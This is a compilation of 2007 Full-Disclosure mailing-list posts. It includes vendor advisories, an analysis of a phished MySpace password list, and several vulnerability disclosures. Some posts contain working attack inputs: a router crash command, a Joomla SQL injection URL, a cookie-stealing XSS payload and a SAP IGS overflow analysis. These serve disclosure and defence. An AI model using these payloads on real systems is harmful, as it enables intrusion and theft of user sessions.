Re: [Full-disclosure] Grab a myspace credential
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Thanks for the crunch down on the data Carl. I've not had time to analyze the list myself but that's the exact information I would have been after. Cheers! Sûnnet Beskerming wrote: Where did it all come from? The prevailing theory is that the 'Tom' account was successfully phished / breached (note - the real Tom has a separate account) and used to send out a Bulletin to all Friends (almost all users on MySpace) with the malicious link contained. From there it was a matter of waiting for the clicks to roll in. Claimed evidence of the hack of 'Tom' is provided across several Digg stories (http://www.digg.com/security/ MySpace_s_Tom_s_Profile_Hacked_Sending_Links_to_Phishing_Website) (http://digg.com/security/Myspace_Tom_gets_hacked_PIC) from the 2-3 days prior to the list being pushed to F-D. Although screenshots can be faked, the examples that have been posted do correctly reflect how a Bulletin-based attack would appear. With the numerous current active XSS vulnerabilities present on MySpace, it is reasonable to believe this chain of events. Basic analysis of the list (which I believe is a much better source than the one Bruce Schneier commented on [http://www.schneier.com/ blog/archives/2006/12/realworld_passw.html]) throws up some interesting output: - A little more than 2% of the full list is abuse directed at the site operator (more when duplicate records are removed), including some basic ASCII porn mixed in with the results. - For too many users, if the login didn't work the first time, nothing was going to stop them from try, try, trying again (I'd regard those records as excellent live data). Removing duplicate logins takes the list from 56k records to 41k. - Even better, some of the repeated attempts are users correcting mistakes from the first time they tried to enter their details. - It's a family thing. It appears that some users (who only tried 5-6 times to login) convinced family members to try and login to the site themselves (or family were caught the same way). - An obscure email address is not an effective means of hiding identity, especially if the user then spells out their full name in their password. - While not the exclusive domain of Hotmail (15162/11360) / AOL (7137/5448) / MSN (1449/1069) / Gmail (825/620) / Yahoo (16562/12168) account holders, the list is heavily biased towards them (orig list/ duplicates removed). - Approximately 25% of the results for each of the main email domains is the result of multiple attempted logins (surprisingly consistent across each domain). - At least one request from a user to target a specific myspace account. - Password strength is fairly weak for most users. A simple dictionary attack will capture most of the passwords available. Repeated login attempts appear to be associated with weaker passwords. Variations to standard dictionary words seems to be restricted largely to adding a number before and / or after the word. Carl Sûnnet Beskerming Pty. Ltd. Adelaide, Australia http://www.beskerming.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFFr4HOnBEWLrrYRl8RAlQJAJ9pGym0pFI9f24Bsh5thbo5I9be9gCcD07q VIUyRY/VR5poxoLOxgr4nd8= =aqiF -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] mbsebbs 0.70.0 below local root exploit
https://prdelka.blackart.org.uk/exploitz/prdelka-vs-GNU-mbsebbs.c sux, fixes available. ___ The all-new Yahoo! Mail goes wherever you go - free your email address from your Internet provider. http://uk.docs.yahoo.com/nowyoucan.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] The Quidway Router local DOS
Quidway Router Local DOS attack By: Handrix handrix_at_morx_org 18 January 2007 MorX security research team www.morx.org Description: The Quidway Router's firmware is vulnerable to a local denial of service attack, there are a request to turn off the engine. Simple poc realeased by : Routersh arp .A\ AAA.AA.AA After the Router crash, wait a while and type sh version to verify this bug: Routersh ver VRP (tm) software, Version 1.43 2500E-003 Copyright (c) 1997-2002 HUAWEI TECH CO., LTD. Compiled 20:53:47, Nov 7 2002 , Quidway R1600 uptime is 0 days 0 hours 1 minutes 3 seconds. Quidway R1600 with 1 68360 Processor 16 MbytesDRAM 4608 KbytesFlash Memory hardware version is 1.0 Vendor: Huawei Vulnerable version: Quidway R1600 (Versatile Routing Platform, version 1.43 2500E-003) Maybe others. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Cisco Security Advisory: SSL/TLS Certificate and SSH Public Key Validation Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Cisco Security Advisory: SSL/TLS Certificate and SSH Public Key Validation Vulnerability Advisory ID: cisco-sa-20070118-certs http://www.cisco.com/warp/public/707/cisco-sa-20070118-certs.shtml Revision 1.0 For Public Release 2007 January 18 1600 UTC (GMT) - --- Summary === The Cisco Security Monitoring, Analysis and Response System (CS-MARS) and the Cisco Adaptive Security Device Manager (ASDM) do not validate the Secure Sockets Layer (SSL)/Transport Layer Security (TLS) certificates or Secure Shell (SSH) public keys presented by devices they are configured to connect to. Malicious users may be able to use this lack of certificate or public key validation to impersonate the devices that these affected products connect to, which could then be used to obtain sensitive information or misreport information. Cisco has made free software available to address this vulnerability for affected customers. This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070118-certs.shtml. Affected Products = The following products are affected by the vulnerability described in this document: * Cisco Security Monitoring, Analysis and Response System (CS-MARS) All CS-MARS versions prior to 4.2.3 are affected. To verify the version of CS-MARS software, log into CS-MARS web interface using a web browser and go to the Help tab located on the top-right corner of the browser window. Then click on the About link. The CS-MARS version will be displayed in the center of the browser window under CS-MARS Information. Alternatively, it is possible to use an SSH connection or a direct serial console connection to verify the version of the CS-MARS software by logging into the system administration command line interface with the pnadmin account and executing the version command: shell$ ssh [EMAIL PROTECTED] [EMAIL PROTECTED]'s password: Last login: Mon Jan 8 18:42:45 2007 from 10.0.0.2 CS MARS - Mitigation and Response System ? for list of commands [pnadmin]$ version 4.2.3 (2403) * Cisco Adaptive Security Device Manager (ASDM) All ASDM versions prior to 5.2(2.54) are affected when the ASDM Launcher (the stand-alone version of ASDM) is used. If the ASDM Applet is used, i.e. ASDM is launched via a web browser, then it is the web browser's responsibility to verify the certificates presented by the devices that ASDM connects to. The user can instruct the web browser to save devices' root Certificate Authority certificates so a warning is generated if something changes (this can be used as a workaround - please refer to the Workarounds section for details.) To verify the version of ASDM software, launch ASDM and look in the General tab of the Device Information section. No other Cisco products are currently known to be affected by this vulnerability. Details === Some Cisco products connect to different devices for configuration or monitoring purposes. The actual connection method used varies depending on the product, but SSL/TLS and SSH are the most prevalent ones due to their use of strong cryptography to ensure the confidentiality and integrity of the communication. Two examples of these products include the Cisco Security Monitoring, Analysis and Response System (CS-MARS), a security threat mitigation system that talks to devices such as IPS sensors and firewalls, and the Cisco Adaptive Security Device Manager (ASDM), which provides management and monitoring services for the Cisco ASA 5500 Series Adaptive Security Appliances, Cisco PIX 500 Series Security Appliances and the Firewall Services Modules for the Cisco Catalyst 6500 Switches and the Cisco 7600 Series Routers. When these products connect to their managed devices via SSL/TLS or SSH, they do not validate the SSL/TLS certificates or SSH public keys presented by these managed devices. Because the certificates and public keys presented by devices are not validated, in the event that a certificate or public key has changed, the affected products will not be able to determine whether the device they are communicating with is legitimate, or if it is a device impersonating a legitimate one. The following Cisco Bug IDs are being used to track these vulnerabilities on the affected products: * CS-MARS - CSCsf95930 * ASDM - CSCsg78595 Vulnerability Scoring Details + Cisco is providing scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). Cisco will provide a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. Cisco PSIRT will set the bias in all cases to normal
[Full-disclosure] CYBSEC - Security Advisory: SAP Internet Graphics Service (IGS) Remote Buffer Overflow
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 (The following advisory is also available in PDF format for download at: http://www.cybsec.com/vuln/CYBSEC-Security_Pre-Advisory_SAP_IGS_Remote_Buffer_Overflow.pdf ) This advisory contains the full-detailed information regarding the vulnerability described in CYBSEC Security Pre-Advisory: SAP Internet Graphics Service (IGS) Remote Buffer Overflow. CYBSEC S.A. www.cybsec.com Advisory Name: SAP Internet Graphics Service (IGS) Remote Buffer Overflow == Vulnerability Class: Heap Buffer Overflow Release Date: 2007-01-18 = Affected Applications: == * SAP IGS 6.40 Patchlevel = 15 * SAP IGS 7.00 Patchlevel = 3 Affected Platforms: === * AIX 64 bits * HP-UX on IA64 64bit * HP-UX on PA-RISC 64bit * Linux on IA32 32bit * Linux on IA64 64bit * Linux on Power 64bit * Linux on x86_64 64bit * Linux on zSeries 64bit * OS/400 V5R2M0 * Solaris on SPARC 64bit * TRU64 64bit * Windows Server on IA32 32bit * Windows Server on IA64 64bit * Windows Server on x64 64bit Local / Remote: Remote === Severity: High = Author: Mariano Nuñez Di Croce === Vendor Status: == * Confirmed, update released. Reference to Vulnerability Disclosure Policy: = http://www.cybsec.com/vulnerability_policy.pdf Product Overview: == The IGS provides a server architecture where data from an SAP System or other sources can be used to generate graphical or non-graphical output. It is important to note that IGS is installed and activated by default with the Web Application Server (versions = 6.30) Vulnerability Description: == A specially crafted HTTP request can trigger a remote buffer overflow in SAP IGS service. Technical Details: == The ADM:GETLOGFILE command receives a portwatcher as a parameter. If the specified portwatcher is not found, an error message is returned to the client. The vulnerability specifically exists in the processing of this error message. The message is build by the use of the _snprintf() function, which helps to prevent the occurrence of buffer overflows by limiting the number of bytes written to the destination buffer: - -- 8B5424 14MOV EDX,DWORD PTR SS:[ESP+14]; Portwatcher string (controlled) 52 PUSH EDX 68 B49C5700 PUSH igsmux.00579CB4 ; ASCII Could not find portwatcher %s 8D8424 B000 LEA EAX,DWORD PTR SS:[ESP+B0]; Destination buffer 68 0004 PUSH 400 ; Output 1024 bytes max 50 PUSH EAX E8 DA881100 CALL JMP.MSVCR71._snprintf - -- Therefore, if a parameter of more than 998 bytes is received, only the first 1024 bytes of the resulting string (after concatenation) would be stored in the destination buffer and no overflow would occur. To present this error message to the client, an HTTP response is crafted. Its content is prepared in a buffer stored in the heap. After some procedures, the error message string is copied to this buffer: - -- 8B4D 0C MOV ECX,DWORD PTR SS:[EBP+C] ; _snprintf() result value 8B75 08 MOV ESI,DWORD PTR SS:[EBP+8] ; Error message string 8DB8 A000LEA EDI,DWORD PTR DS:[EAX+A0] ; Destination buffer 8BC1 MOV EAX,ECX C1E9 02 SHR ECX,2 F3:A5REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI] - -- The _snprintf() function returns the total amount of bytes written, so above code would not seem to be unreasonable. The problem is that, if the source buffer is larger than the maximum number of characters to store (count), a particular behavior takes place: ?If the number of bytes required to store the data exceeds count, then count bytes of data are stored in buffer and a negative value is returned? [MSDN] Therefore, if the string is larger than 1024 bytes, after the first instruction of the presented code ECX would contain a negative number treated as unsigned, resulting in a very big number. Then, when the memory copy operation takes place, heap space reserved would be overflowed. This will overwrite heap block structures, which would eventually be used and result in the execution of the famous set of instructions: - -- 8901 MOV DWORD PTR DS:[ECX],EAX 8948 04 MOV DWORD PTR DS:[EAX+4],ECX - -- As both ECX and EAX can be controlled, an arbitrary DWORD overwrite is possible, leading to the possibility of executing
[Full-disclosure] Persistent Web Backdoor
It is simple, It is lame, Yet very interesting. This kind of stuff rise a lot of questions. http://www.gnucitizen.org/projects/greasecarnaval -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Vulnerability Disclosure comments
Thank you to all who helped out by sharing your opinions on our vulnerability articles!___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CYBSEC - Security Advisory: SAP Internet Graphics Service (IGS) Remote Buffer Overflow
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 (The following advisory is also available in PDF format for download at: http://www.cybsec.com/vuln/CYBSEC-Security_Pre-Advisory_SAP_IGS_Remote_Buffer_Overflow.pdf ) This advisory contains the full-detailed information regarding the vulnerability described in CYBSEC Security Pre-Advisory: SAP Internet Graphics Service (IGS) Remote Buffer Overflow. CYBSEC S.A. www.cybsec.com Advisory Name: SAP Internet Graphics Service (IGS) Remote Buffer Overflow == Vulnerability Class: Heap Buffer Overflow Release Date: 2007-01-18 = Affected Applications: == * SAP IGS 6.40 Patchlevel = 15 * SAP IGS 7.00 Patchlevel = 3 Affected Platforms: === * AIX 64 bits * HP-UX on IA64 64bit * HP-UX on PA-RISC 64bit * Linux on IA32 32bit * Linux on IA64 64bit * Linux on Power 64bit * Linux on x86_64 64bit * Linux on zSeries 64bit * OS/400 V5R2M0 * Solaris on SPARC 64bit * TRU64 64bit * Windows Server on IA32 32bit * Windows Server on IA64 64bit * Windows Server on x64 64bit Local / Remote: Remote === Severity: High = Author: Mariano Nuñez Di Croce === Vendor Status: == * Confirmed, update released. Reference to Vulnerability Disclosure Policy: = http://www.cybsec.com/vulnerability_policy.pdf Product Overview: == The IGS provides a server architecture where data from an SAP System or other sources can be used to generate graphical or non-graphical output. It is important to note that IGS is installed and activated by default with the Web Application Server (versions = 6.30) Vulnerability Description: == A specially crafted HTTP request can trigger a remote buffer overflow in SAP IGS service. Technical Details: == The ADM:GETLOGFILE command receives a portwatcher as a parameter. If the specified portwatcher is not found, an error message is returned to the client. The vulnerability specifically exists in the processing of this error message. The message is build by the use of the _snprintf() function, which helps to prevent the occurrence of buffer overflows by limiting the number of bytes written to the destination buffer: - -- 8B5424 14MOV EDX,DWORD PTR SS:[ESP+14]; Portwatcher string (controlled) 52 PUSH EDX 68 B49C5700 PUSH igsmux.00579CB4 ; ASCII Could not find portwatcher %s 8D8424 B000 LEA EAX,DWORD PTR SS:[ESP+B0]; Destination buffer 68 0004 PUSH 400 ; Output 1024 bytes max 50 PUSH EAX E8 DA881100 CALL JMP.MSVCR71._snprintf - -- Therefore, if a parameter of more than 998 bytes is received, only the first 1024 bytes of the resulting string (after concatenation) would be stored in the destination buffer and no overflow would occur. To present this error message to the client, an HTTP response is crafted. Its content is prepared in a buffer stored in the heap. After some procedures, the error message string is copied to this buffer: - -- 8B4D 0C MOV ECX,DWORD PTR SS:[EBP+C] ; _snprintf() result value 8B75 08 MOV ESI,DWORD PTR SS:[EBP+8] ; Error message string 8DB8 A000LEA EDI,DWORD PTR DS:[EAX+A0] ; Destination buffer 8BC1 MOV EAX,ECX C1E9 02 SHR ECX,2 F3:A5REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI] - -- The _snprintf() function returns the total amount of bytes written, so above code would not seem to be unreasonable. The problem is that, if the source buffer is larger than the maximum number of characters to store (count), a particular behavior takes place: ?If the number of bytes required to store the data exceeds count, then count bytes of data are stored in buffer and a negative value is returned? [MSDN] Therefore, if the string is larger than 1024 bytes, after the first instruction of the presented code ECX would contain a negative number treated as unsigned, resulting in a very big number. Then, when the memory copy operation takes place, heap space reserved would be overflowed. This will overwrite heap block structures, which would eventually be used and result in the execution of the famous set of instructions: - -- 8901 MOV DWORD PTR DS:[ECX],EAX 8948 04 MOV DWORD PTR DS:[EAX+4],ECX - -- As both ECX and EAX can be controlled, an arbitrary DWORD overwrite is possible, leading to the possibility of executing
[Full-disclosure] The vulnerabilities festival !
--- WWW.GJTR-KMJNILSGJTR-KMJNILSGJTR-KMJNILSGJTR-KMJNILSGJTR-KMJNILSGJTR-KMJNERS.IR WWW.H-B-XKJLWPYJHB-XKKJLWPJHB--XKKLWPJHB--XXKKLWPJHB-XXKKLLWJHB--XXKLLWJJERS.IR WWW.HEA-D-IJIEFUHA-D--IJIEUHA--D-IJIEUHA--D--IJIEHA--D--IJJIHA---D-IJJIIHERS.IR WWW.AZNAUJ-OXILMANAUJJ-OXIMANAAUJ-OXXIMANAUJ--OXIMAANAUJ--OXMAANNAJ--OOXMERS.IR WWW.CFGETPNDE-NNCGETPNDE-NNCGEETNDE-NNCGEETNDDENNCGGEETNDDENCGGEETNDDDENCERS.IR WWW.IJJGDQIIJK-MIJGDQIIJK-MIJGGDIIJK-MIJGGDIIIJ-MIJJGGDIIIJ-IJJGGDJ-IERS.IR WWW.JJFJOXZTRNMG-FJOXXZTRNG-FJJOXZTRRNG-FJOXZZTRNG--FJOXZZTRG--FFJXZZTTRGERS.IR WWW.YNWSMFZCYFKYYWSMFFZCYFYYWSSMFZCYYFYYWSMFZZCWSMFZZCCYYYWSSMFZCCYYYERS.IR WWW.WIUYR-EZNFDRWUYR--EZNFRWUYYR-EZNNFRWUYR-EEZNNFRWYR-EEZZNFRWYYR-EZZNFFERS.IR WWW.AZJMKHACKCUSAZJMKHACKCUSAZJMKHACKCUSAZJMKHACKCUSAZJMKHACKCUSAZJMKHACKERS.IR --- Salam be hamegi :) Several vulnerabilities have been found in several programs : *) 5 sql injection bugs in PHP-Nuke *) Several sql injection and full path disclosure bugs in Joomla 1.5.0 Beta *) 1 sql injection bug in Mambo 4.6.1 and Joomla 1.0.11 *) 1 sql injection and 1 XSS bugs in Virtuemart 1.0.7 *) 5 sql injection bugs in Xoops 2.0.16 core + weblinks module *) 3 sql injection and 1 XSS bugs in DocMan 1.3 RC2 *) 2 sql injection bugs in ATutor 1.5.3.2 *) 3 sql injection bugs in Letterman 1.2.3 *) 1 file disclosure bug in WDaemon 9.5.4 *) 3 security bugs in PostNuke 0.764 I tried to ommit dangerous and exploitable details from this advisory, so some sections are not discribed in details ... The original advisory (in Persian) is located at : http://www.hackers.ir/advisories/festival.txt --- I) PHP-Nuke : There are 5 sql injections in PHP-Nuke 7.9 (and maybe other versions including version 8) : Three of them exist in 'advertising', 'weblinks' and 'reviews' sections, which can be dangerous and are not discribed here . Two others are in admin section : The 'active' parameter has been passed to module_status() function without proper checking : File /admin/modules/modules.php, Line 281 : ** module_status($mid, $active); And in module_status() function : File /admin/modules/modules.php, Line 173 : ** $db-sql_query(update . $prefix . _modules set active='$active' where mid='$mid'); Also the 'ad_class', 'imageurl', 'clickurl', 'ad_code' and 'position' parameters are not checked properly : File modules/Advertising/admin/index.php, Line 1131 : ** BannersAdd($name, $cid, $adname, $imptotal, $imageurl, $clickurl, $alttext, $position, $active, $ad_class, $ad_code, $ad_width, $ad_height); And in BannersAdd() function : File modules/Advertising/admin/index.php, Line 351 : ** $db-sql_query(insert into . $prefix . _banner values (NULL, '$cid', '$adname', '$imptotal', '1', '0', '$imageurl', '$clickurl', '$alttext', now(), '00-00- 00:00:00', '$position', '$active', '$ad_class', '$ad_code', '$ad_width', '$ad_height')); The author told me he will fix the bugs for the next version (8.1) . --- II) Joomla 1.5.0 Beta : As Joomla! 1.5.0 Beta default installation has mentioned : Joomla! 1.5.0 Beta should NOT to be used for `live` or `production` sites. So, I can release more details about these bugs :) There are several sql injection bugs in Joomla 1.5.0 Beta : The 'searchword' parameter is not checked properly before be used in the sql query in several files : In both 'plugins/search/content.php' and 'plugins/search/weblinks.php' files, the '$where' variable is not checked . Also, in 'plugins/search/contacts.php', 'plugins/search/categories.php' and 'plugins/search/sections.php' files, the '$text' var is affected. For example : File plugins/search/sections.php, Line 75 : :: $query = SELECT a.name AS title, :: . \n a.description AS text, :: . \n '' AS created, :: . \n '2' AS browsernav, :: . \n a.id AS secid, m.id AS menuid, m.type AS menutype :: . \n FROM #__sections AS a :: . \n LEFT JOIN #__menu AS m ON m.componentid = a.id ** . \n WHERE ( a.name LIKE '%$text%' ** . \n OR a.title LIKE '%$text%' ** . \n OR a.description LIKE '%$text%' ) :: . \n AND a.published = 1 :: . \n AND a.access = .$user-get( 'gid' ) :: . \n AND ( m.type = 'content_section' OR m.type = 'content_blog_section' ) :: . \n GROUP BY a.id :: . \n ORDER BY $order :: ; The search word is limited to 20 characters, so this bug doesnt seem to be critical . PoC : http://hacked/index.php?searchword=%25'/**/SQLINJECTIONoption=com_searchItemid=0 Another sql injection exists in check() function . The 'email' parameter is not checked properly : File libraries/joomla/database/table/user.php, Line 104 : ::
[Full-disclosure] [x0ne-h4ck] sabros.us 1.7 XSS Exploit
-=[ADVISORY---]=- sabros.us 1.7 Author: CorryL[EMAIL PROTECTED] -=[---]=- -=[+] Application:sabros.us -=[+] Version:1.7 -=[+] Vendor's URL: http://sourceforge.net/projects/sabrosus/ -=[+] Platform: Windows\Linux\Unix -=[+] Bug type: Cross-Site Script -=[+] Exploitation: Remote -=[-] -=[+] Author: CorryL ~ corryl80[at]gmail[dot]com ~ -=[+] Reference: www.x0n3-h4ck.org -=[+] Virtual Office: http://www.kasamba.com/CorryL -=[+] Irc Chan: irc.darksin.net #x0n3-h4ck ..::[ Descriprion ]::.. sabros.us is a CMS to put your bookmarks online with folksonomy support; just like del.icio.us, but the big diference is you will have the complete control of the source code and written on PHP with MySQL as backend we make it cross platform. ..::[ Proof Of Concept ]::.. http://remote-server/index.php?tag=/titlescriptalert(document.cookie)/script ** Registrati ad Alice Basic e scarica Alice Messenger, il nuovo instant messenger che ti fa chattare GRATIS con i tuoi amici! Per maggiori informazioni vai su: http://adsl.alice.it/servizi/alicebasic.html?pmk=psmail_foot01 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDKSA-2007:018 ] - Updated koffice packages fix crafted pdf file vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:018 http://www.mandriva.com/security/ ___ Package : koffice Date: January 18, 2007 Affected: 2007.0 ___ Problem Description: The Adobe PDF specification 1.3, as implemented by xpdf 3.0.1 patch 2, kpdf in KDE before 3.5.5, and other products, allows remote attackers to have an unknown impact, possibly including denial of service (infinite loop), arbitrary code execution, or memory corruption, via a PDF file with a (1) crafted catalog dictionary or (2) a crafted Pages attribute that references an invalid page tree node. The updated packages have been patched to correct this problem. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0104 ___ Updated Packages: Mandriva Linux 2007.0: b1cdf9519f03f701c6e538a90a23caf9 2007.0/i586/koffice-1.5.91-3.3mdv2007.0.i586.rpm 783305f6c0b3c3cef71d8479fa17a095 2007.0/i586/koffice-karbon-1.5.91-3.3mdv2007.0.i586.rpm ff64ba24814230cf14f50e84ddccbb78 2007.0/i586/koffice-kexi-1.5.91-3.3mdv2007.0.i586.rpm 273e5672aca7b387f879aecbdef48278 2007.0/i586/koffice-kformula-1.5.91-3.3mdv2007.0.i586.rpm 37d873cba6a9b8fa9d0d6b33a71597e0 2007.0/i586/koffice-kivio-1.5.91-3.3mdv2007.0.i586.rpm d961fa397c4a72a034b7baf9e9ecfb9a 2007.0/i586/koffice-koshell-1.5.91-3.3mdv2007.0.i586.rpm 56592c5a74838446e649c15c48fe8853 2007.0/i586/koffice-kplato-1.5.91-3.3mdv2007.0.i586.rpm 4ebfda9a175e07de07ee197707434a5d 2007.0/i586/koffice-kpresenter-1.5.91-3.3mdv2007.0.i586.rpm 064db7d95802e559144bfa5b9c408bb7 2007.0/i586/koffice-krita-1.5.91-3.3mdv2007.0.i586.rpm 70fa6928e34a9ebcbd0359763695d791 2007.0/i586/koffice-kspread-1.5.91-3.3mdv2007.0.i586.rpm 1dca8ca1061a329290251bda492cb8c4 2007.0/i586/koffice-kugar-1.5.91-3.3mdv2007.0.i586.rpm a4bc6a10e43743f46cbc05173e325484 2007.0/i586/koffice-kword-1.5.91-3.3mdv2007.0.i586.rpm cf559afa4445ba333ac23062026ab76d 2007.0/i586/koffice-progs-1.5.91-3.3mdv2007.0.i586.rpm 57049355d5b9d28a540a36e9d37ea3f9 2007.0/i586/libkoffice2-karbon-1.5.91-3.3mdv2007.0.i586.rpm c28ab56ff8bc4bafb8256321ad11f69c 2007.0/i586/libkoffice2-karbon-devel-1.5.91-3.3mdv2007.0.i586.rpm dc4e1ac6a0d357a574d1d8f837e2b485 2007.0/i586/libkoffice2-kexi-1.5.91-3.3mdv2007.0.i586.rpm 305b86ad6ca9d684839308b9326ccb55 2007.0/i586/libkoffice2-kexi-devel-1.5.91-3.3mdv2007.0.i586.rpm f1011e0ad3d2783b5d01742736e3bbcc 2007.0/i586/libkoffice2-kformula-1.5.91-3.3mdv2007.0.i586.rpm 4fe66ee781ad6cd648cfa705dc6e1dbc 2007.0/i586/libkoffice2-kformula-devel-1.5.91-3.3mdv2007.0.i586.rpm 4a937f22adff9c856700f208438132cc 2007.0/i586/libkoffice2-kivio-1.5.91-3.3mdv2007.0.i586.rpm 520258316a44dfbf6c13c7d7b96d5504 2007.0/i586/libkoffice2-kivio-devel-1.5.91-3.3mdv2007.0.i586.rpm f62280e2ab006729efc6a4af379e6a23 2007.0/i586/libkoffice2-koshell-1.5.91-3.3mdv2007.0.i586.rpm 036045cae6863b7872c20ab4d1cc5688 2007.0/i586/libkoffice2-kplato-1.5.91-3.3mdv2007.0.i586.rpm 1e86cd4131a0b228c18209194719e672 2007.0/i586/libkoffice2-kpresenter-1.5.91-3.3mdv2007.0.i586.rpm 6d4129270a176cc103efd3d3af77fb86 2007.0/i586/libkoffice2-kpresenter-devel-1.5.91-3.3mdv2007.0.i586.rpm c593f3e2688aaba40c43c33e9d7105ea 2007.0/i586/libkoffice2-krita-1.5.91-3.3mdv2007.0.i586.rpm 4650aaedeb219009e13a714776ed306d 2007.0/i586/libkoffice2-krita-devel-1.5.91-3.3mdv2007.0.i586.rpm 1a9d2cb47aa3ee4766c58c7dab59e5d8 2007.0/i586/libkoffice2-kspread-1.5.91-3.3mdv2007.0.i586.rpm 6aaec493fd2d9893028846f4f8e21462 2007.0/i586/libkoffice2-kspread-devel-1.5.91-3.3mdv2007.0.i586.rpm e440b2660d6c6a30dfe1a0f916f28710 2007.0/i586/libkoffice2-kugar-1.5.91-3.3mdv2007.0.i586.rpm 34848cf4d92ab20936380a0b1848b87c 2007.0/i586/libkoffice2-kugar-devel-1.5.91-3.3mdv2007.0.i586.rpm 1d8d0aa310a11a28afd0372e04dcf3d1 2007.0/i586/libkoffice2-kword-1.5.91-3.3mdv2007.0.i586.rpm e141aae296f1ea77ad8ba8e911035a6f 2007.0/i586/libkoffice2-kword-devel-1.5.91-3.3mdv2007.0.i586.rpm f3b45e02397192707a4717e4796f8e44 2007.0/i586/libkoffice2-progs-1.5.91-3.3mdv2007.0.i586.rpm 45ee5c8cb61a7be6802ab927c15fcc45 2007.0/i586/libkoffice2-progs-devel-1.5.91-3.3mdv2007.0.i586.rpm 2dcb5c2b4e73e2213718164f97fb4877 2007.0/SRPMS/koffice-1.5.91-3.3mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: 837b0881b72c5b853532dd2502d0ff7a 2007.0/x86_64/koffice-1.5.91-3.3mdv2007.0.x86_64.rpm 33728635d9a94f6b7231f2a80ddb50ae 2007.0/x86_64/koffice-karbon-1.5.91-3.3mdv2007.0.x86_64.rpm c76e8403a507ebc8f249f6f2334935dd 2007.0/x86_64/koffice-kexi-1.5.91-3.3mdv2007.0.x86_64.rpm
[Full-disclosure] [ MDKSA-2007:019 ] - Updated pdftohtml packages fix crafted pdf file vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:019 http://www.mandriva.com/security/ ___ Package : pdftohtml Date: January 18, 2007 Affected: 2006.0, 2007.0 ___ Problem Description: The Adobe PDF specification 1.3, as implemented by xpdf 3.0.1 patch 2, kpdf in KDE before 3.5.5, and other products, allows remote attackers to have an unknown impact, possibly including denial of service (infinite loop), arbitrary code execution, or memory corruption, via a PDF file with a (1) crafted catalog dictionary or (2) a crafted Pages attribute that references an invalid page tree node. The updated packages have been patched to correct this problem. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0104 ___ Updated Packages: Mandriva Linux 2006.0: 8c5528f9018b261887538d3dac6ce8bb 2006.0/i586/pdftohtml-0.36-2.2.20060mdk.i586.rpm 45b30c0ca9d4179097948e37e5cccb85 2006.0/SRPMS/pdftohtml-0.36-2.2.20060mdk.src.rpm Mandriva Linux 2006.0/X86_64: 784d32b1f0106db8b9ec1e5ad2bf3f7f 2006.0/x86_64/pdftohtml-0.36-2.2.20060mdk.x86_64.rpm 45b30c0ca9d4179097948e37e5cccb85 2006.0/SRPMS/pdftohtml-0.36-2.2.20060mdk.src.rpm Mandriva Linux 2007.0: e76274c7e22d68f38a9e1ae97494f71f 2007.0/i586/pdftohtml-0.36-5.1mdv2007.0.i586.rpm d52fb3abbff1579eb3ca70aacac01273 2007.0/SRPMS/pdftohtml-0.36-5.1mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: 06be394049978fc5b4ecf512bc61d777 2007.0/x86_64/pdftohtml-0.36-5.1mdv2007.0.x86_64.rpm d52fb3abbff1579eb3ca70aacac01273 2007.0/SRPMS/pdftohtml-0.36-5.1mdv2007.0.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFFr7TfmqjQ0CJFipgRAtRNAJ9xsaBrJx4c+xXnA7FYoHH1rTaBWACgkpFj q+qqAteSCHta5qNNTjQ3l9I= =PzqW -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDKSA-2007:020 ] - Updated poppler packages fix crafted pdf file vulnerability
